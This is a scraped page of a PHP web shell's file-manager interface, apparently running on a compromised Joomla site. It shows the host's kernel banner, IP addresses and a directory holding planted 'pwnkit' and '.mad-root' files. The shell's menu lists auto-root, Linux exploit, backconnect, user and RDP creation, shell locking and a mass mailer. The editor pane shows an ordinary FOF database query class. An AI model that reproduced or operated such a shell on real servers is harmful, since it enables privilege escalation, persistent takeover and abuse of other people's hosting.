Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
libraries /
fof /
database /
query /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
element.php
2.59
KB
-rw-r--r--
limitable.php
2.24
KB
-rw-r--r--
mysql.php
731
B
-rw-r--r--
mysqli.php
3.24
KB
-rw-r--r--
oracle.php
5.45
KB
-rw-r--r--
pdo.php
595
B
-rw-r--r--
pdomysql.php
663
B
-rw-r--r--
postgresql.php
13.8
KB
-rw-r--r--
preparable.php
2.31
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
sqlazure.php
1.01
KB
-rw-r--r--
sqlite.php
7.4
KB
-rw-r--r--
sqlsrv.php
8.51
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mysql.php
<?php /** * @package FrameworkOnFramework * @subpackage database * @copyright Copyright (C) 2010-2016 Nicholas K. Dionysopoulos / Akeeba Ltd. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt * * This file is adapted from the Joomla! Platform. It is used to iterate a database cursor returning FOFTable objects * instead of plain stdClass objects */ // Protect from unauthorized access defined('FOF_INCLUDED') or die; /** * Query Building Class. * * @since 11.1 * @deprecated Will be removed when the minimum supported PHP version no longer includes the deprecated PHP `mysql` extension */ class FOFDatabaseQueryMysql extends FOFDatabaseQueryMysqli { }
Close